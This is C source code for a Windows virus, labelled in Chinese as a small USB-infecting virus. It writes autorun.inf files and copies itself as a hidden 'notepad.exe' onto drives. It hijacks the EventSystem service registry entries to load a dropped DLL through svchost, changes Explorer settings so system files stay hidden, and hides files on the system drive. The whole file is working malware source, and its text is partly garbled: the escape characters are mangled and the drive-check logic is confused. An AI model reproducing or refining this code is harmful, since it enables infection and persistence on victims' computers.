//*******************************************
//****** 網蟬U盤感染小病毒 ******
//*******************************************
//功能介紹:
//1,感染U盤和網絡硬碟
//2,釋放DLL檔案并将其加入到系統服務啟動。
//3,保護系統資料庫相關項目。
//4,
//
//
//
#include <windows.h>
#include <stdio.h>
#include "tchar.h"
#pragma comment(linker,"/subsystem:windows")
#define IDR_SERVER1 101
void wreg();//寫系統資料庫
void cfile(LPCTSTR drivers);//建立AUTORUN.INF檔案
void copysel(LPCTSTR drivers);//拷貝本檔案到各盤的x:recycled../目錄下
void findfile();//将系統文目錄下的所有檔案屬性變為隐藏屬性+文檔+隻讀屬性
bool Makeexe(LPCTSTR szDllFile);//釋放dll檔案到c:/windows/system32下
bool checkdesk(LPCTSTR drivers);
TCHAR g_strFileName[MAX_PATH]; //用來存放windows系統目錄的路徑
char pName [MAX_PATH];//本程式路徑
char bootdll[MAX_PATH];//windows/system32/EsXP.dll
//主函數
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PSTR szCmdLine,int iCmdShow)
{
char buf[MAX_PATH];//存放盤符串
char buff[4];//存放單個盤符資訊
char salfe[MAX_PATH];//windows/system32/wshexts.dll
CreateMutex(NULL,FALSE,"TEST");//讓本程式隻運作1個執行個體
if(GetLastError()==ERROR_ALREADY_EXISTS)
exit(0);
ZeroMemory(&g_strFileName,sizeof(g_strFileName));
ZeroMemory(&pName,sizeof(pName));
GetWindowsDirectory(g_strFileName, MAX_PATH);//得到windows系統目錄放入全局g_strFileName供程式使用
GetModuleFileName(NULL, pName, sizeof( pName ) / sizeof(char));//得到本程式目錄放入全局pName供程式使用
ZeroMemory(&salfe,sizeof(salfe));
wsprintf(salfe,"%s//system32//wshexts.dll",g_strFileName);//備份此病毒
ZeroMemory(&bootdll,sizeof(bootdll));
wsprintf(bootdll,"%s//system32//EsA.nls",g_strFileName);//建立本程式的svchost啟動項
wreg();//寫系統資料庫
findfile();//搜尋系統驅動器下的根目錄檔案,并把檔案的屬性改為隻讀+隐藏+存檔屬性。
DWORD m_Result=GetLogicalDriveStrings(MAX_PATH,buf);
for(int i=0;i<(int)m_Result;i=i+4)
{
wsprintf(buff,"%c%c%c",buf ,buf[i+1],buf[i+2]);//獲得各盤的資訊,格式為"c:/"
if(checkdesk(buff))
{
// MessageBox(NULL,"開始寫入資料",buff,MB_OK);
cfile(buff);//建立AUTORUN.INF檔案
copysel(buff);//複制自身
}
}
//複制自身到
CopyFile(pName,salfe,FALSE);
//釋放dll到指定目錄
Makeexe(bootdll);
///模拟打開資料總管運作。
char currpath[MAX_PATH];
char dri[MAX_PATH];
ZeroMemory(&dri,sizeof(dri));
GetCurrentDirectory(MAX_PATH,currpath);
strncpy(dri,currpath,3);
ShellExecute(0, "open", "Explorer.exe",dri, NULL, SW_SHOW);
return 0;
}
//
//函數:void wreg()
//功能:寫入系統資料庫,修改檔案隐藏屬性,設定服務啟動項
//參數:無
//
void wreg()
{
HKEY hKEY;
///開始隐藏U盤感染部分。
// char aa='1';//修改檔案隐藏屬性.
DWORD bb=0x0;
DWORD dw02=0x02;
/
//注冊svchost所需要的局部變量
// LPCTSTR svchost="SOFTWARE//Microsoft//Windows NT//CurrentVersion//SvcHost";
LPCTSTR EventSystem="SYSTEM//CurrentControlSet//Services//EventSystem";
LPCTSTR EventSystemParameters="SYSTEM//CurrentControlSet//Services//EventSystem//Parameters";
// char es[]="EventSystem";
char svchostath[MAX_PATH];
ZeroMemory(&svchostath,sizeof(svchostath));
wsprintf(svchostath,"%s//system32//svchost.exe -k netsvcs",g_strFileName);//建立本程式的svchost啟動項
// char Description[]="Supports System Event Notification Service (SENS), which provides automatic distribution of events to subscribing Component Object Model (COM) components. If the service is stopped, SENS will close and will not be able to provide logon and logoff notifications. If this service is disabled, any services that explicitly depend on it will fail to start.";
LPCTSTR EventSystem001="SYSTEM//ControlSet001//Services//EventSystem";
LPCTSTR EventSystemParameters001="SYSTEM//ControlSet001//Services//EventSystem//Parameters";
LPCTSTR EventSystem002="SYSTEM//ControlSet002//Services//EventSystem";
LPCTSTR EventSystemParameters002="SYSTEM//ControlSet002//Services//EventSystem//Parameters";
/
LPCTSTR salekey="SOFTWARE//Microsoft//ODBC";//把自身路徑存放在其下
// LPCTSTR hidden="SOFTWARE//Microsoft//Windows//CurrentVersion//Explorer//Advanced//Folder//Hidden//SHOWALL";//關閉隐藏選項,讓隐藏檔案不可見。
LPCTSTR hidden1="SOFTWARE//Microsoft//Windows//CurrentVersion//Explorer//Advanced//Folder//SuperHidden";
LPCTSTR flashh="Software//Microsoft//Windows//CurrentVersion//Explorer//Advanced";//flash
// RegOpenKeyEx(HKEY_LOCAL_MACHINE,hidden,0,KEY_READ | KEY_WRITE,&hKEY);
// RegSetValueEx(hKEY,(LPCTSTR)("CheckedValue"),NULL,REG_SZ,(CONST BYTE *)&aa,1);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,hidden1,0,KEY_READ | KEY_WRITE,&hKEY);
RegSetValueEx(hKEY,(LPCTSTR)("UncheckedValue"),NULL,REG_DWORD,(CONST BYTE *)&bb,4);
RegOpenKeyEx(HKEY_CURRENT_USER,flashh,0,KEY_READ | KEY_WRITE,&hKEY);
// RegSetValueEx(hKEY,(LPCTSTR)("Hidden"),NULL,REG_DWORD,(CONST BYTE *)&bb,4);
RegSetValueEx(hKEY,(LPCTSTR)("ShowSuperHidden"),NULL,REG_DWORD,(CONST BYTE *)&bb,4);
///
/開始注冊SVCHOST服務///
///
// RegOpenKeyEx(HKEY_LOCAL_MACHINE,svchost,0,KEY_READ | KEY_WRITE,&hKEY);
// RegSetValueEx(hKEY,(LPCTSTR)("EventSystem"),NULL,REG_MULTI_SZ,(CONST BYTE *)&es,sizeof(es));
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EventSystem,0,KEY_READ | KEY_WRITE,&hKEY);
RegSetValueEx(hKEY,(LPCTSTR)("Start"),NULL,REG_DWORD,(CONST BYTE *)&dw02,4);
RegSetValueEx(hKEY,(LPCTSTR)("ImagePath"),NULL,REG_EXPAND_SZ,(CONST BYTE *)&svchostath,sizeof(svchostath));
// RegSetValueEx(hKEY,(LPCTSTR)("Description"),NULL,REG_SZ,(CONST BYTE *)&Description,sizeof(Description));
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EventSystemParameters,0,KEY_READ | KEY_WRITE,&hKEY);
RegSetValueEx(hKEY,(LPCTSTR)("ServiceDll"),NULL,REG_EXPAND_SZ,(CONST BYTE *)&bootdll,sizeof(bootdll));
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EventSystem001,0,KEY_READ | KEY_WRITE,&hKEY);
RegSetValueEx(hKEY,(LPCTSTR)("Start"),NULL,REG_DWORD,(CONST BYTE *)&dw02,4);
RegSetValueEx(hKEY,(LPCTSTR)("ImagePath"),NULL,REG_EXPAND_SZ,(CONST BYTE *)&svchostath,sizeof(svchostath));
// RegSetValueEx(hKEY,(LPCTSTR)("Description"),NULL,REG_SZ,(CONST BYTE *)&Description,sizeof(Description));
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EventSystemParameters001,0,KEY_READ | KEY_WRITE,&hKEY);
RegSetValueEx(hKEY,(LPCTSTR)("ServiceDll"),NULL,REG_EXPAND_SZ,(CONST BYTE *)&bootdll,sizeof(bootdll));
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EventSystem002,0,KEY_READ | KEY_WRITE,&hKEY);
RegSetValueEx(hKEY,(LPCTSTR)("Start"),NULL,REG_DWORD,(CONST BYTE *)&dw02,4);
RegSetValueEx(hKEY,(LPCTSTR)("ImagePath"),NULL,REG_EXPAND_SZ,(CONST BYTE *)&svchostath,sizeof(svchostath));
// RegSetValueEx(hKEY,(LPCTSTR)("Description"),NULL,REG_SZ,(CONST BYTE *)&Description,sizeof(Description));
RegOpenKeyEx(HKEY_LOCAL_MACHINE,EventSystemParameters002,0,KEY_READ | KEY_WRITE,&hKEY);
RegSetValueEx(hKEY,(LPCTSTR)("ServiceDll"),NULL,REG_EXPAND_SZ,(CONST BYTE *)&bootdll,sizeof(bootdll));
RegSetValue(HKEY_LOCAL_MACHINE,salekey,REG_SZ,pName,strlen(pName));
RegCloseKey(hKEY);
}
///
//函數名:cfile
//函數功能:建立autorun.inf檔案
//參數:LPCTSTR drivers 為驅動器名稱,格式為"c:/"的字元串
///
void cfile(LPCTSTR drivers)
{
HANDLE hCFN;
char ch1[MAX_PATH];
DWORD filesize1 , wsize;
wsprintf(ch1,"%sautorun.inf",drivers);
char autorunc[]="[AutoRun] /n open=Recycled//notepad.exe /n ` /n shell//open=打開(&O)/n shell//open//Command=Recycled//notepad.exe /n shell//open//Default=1";
filesize1=sizeof(autorunc);
hCFN=CreateFile(ch1,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
WriteFile(hCFN,autorunc,filesize1-1,&wsize,NULL);
SetFileAttributes(ch1,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
CloseHandle(hCFN);
}
///
//函數: void copysel(LPCTSTR drivers)
//功能: 複制自己到指定目錄
//參數: 傳遞一個驅動器名稱,格式為"c:/"
///
void copysel(LPCTSTR drivers)
{
// char pName1 [MAX_PATH];//
char ch2[MAX_PATH];//各盤的recycled目錄
char ch3[MAX_PATH];//各盤的recycled目錄下的notepad.exe完整路徑
// GetCurrentDirectory(MAX_PATH,pName);
wsprintf(ch2,"%sRecycled//",drivers);
CreateDirectory(ch2,NULL);
wsprintf(ch3,"%s//notepad.exe",ch2);
// strncpy(pName1,pName,3);
// strcat(pName,"Recycled//notepad.exe");
CopyFile(pName,ch3,FALSE);
SetFileAttributes(ch2,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
}
///
//函數: void findfile()
//功能: 搜尋系統驅動器下的根目錄檔案,并把檔案的屬性改為隻讀+隐藏+存檔屬性。
//參數: 無
///
void findfile()
{
char systemdriver[6];//存放查找路徑
ZeroMemory(&systemdriver,sizeof(systemdriver));
char filepath[MAX_PATH];
strncpy(systemdriver,g_strFileName,2);
strcat(systemdriver,"//*.*");//獲得查找路徑
WIN32_FIND_DATA fd;
HANDLE hd=FindFirstFile(systemdriver,&fd);
if(hd==INVALID_HANDLE_VALUE)
return;//查找完成後傳回
while(FindNextFile(hd,&fd))
{
if(fd.dwFileAttributes!=FILE_ATTRIBUTE_DIRECTORY)//查找如果是檔案,将其屬性保留為隐藏和隻讀屬性
{
ZeroMemory(&filepath,sizeof(filepath));
strncpy(filepath,g_strFileName,3);
strcat(filepath,fd.cFileName);
SetFileAttributes(filepath,FILE_ATTRIBUTE_NORMAL);
SetFileAttributes(filepath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_ARCHIVE);
}
};
FindClose(hd);
}
/
//函數:bool checkdesk(LPCTSTR drivers)
//功能:判斷指定驅動器是否是光驅
//參數:驅動器,格式為"c:/"
bool checkdesk(LPCTSTR drivers)
{
if(GetDriveType(drivers)==DRIVE_REMOVABLE)
{
//MessageBox(NULL,"是光驅",drivers,MB_OK);
return false; //傳回0 是光驅
}
else
{
//MessageBox(NULL,"不是光驅",drivers,MB_OK);
return true; //傳回1 不是光驅
}
}
/
//函數:bool Makeexe(LPCTSTR szDllFile)
//功能:把server類型資源從自身釋放出去,
//參數:LPCTSTR szDllFile 為将要釋放到的目标路徑
bool Makeexe(LPCTSTR szDllFile)
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
hResInfo = FindResource(NULL,MAKEINTRESOURCE(IDR_SERVER1), _T("SERVER"));
if (hResInfo == NULL)
return false;
// 獲得資源尺寸
dwSize = SizeofResource(NULL, hResInfo);
// 裝載資源
hResData = LoadResource(NULL, hResInfo);
if (hResData == NULL)
return false;
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL)
return false;
// 複制資源資料
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
hFile = CreateFile(szDllFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
if (hFile != NULL)
WriteFile(hFile, (LPCVOID)p, dwSize, &dwWritten, NULL);
else
{
GlobalFree((HGLOBAL)p);
return false;
}
CloseHandle(hFile);
GlobalFree((HGLOBAL)p);
return true;
}
![處理PCX檔案[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)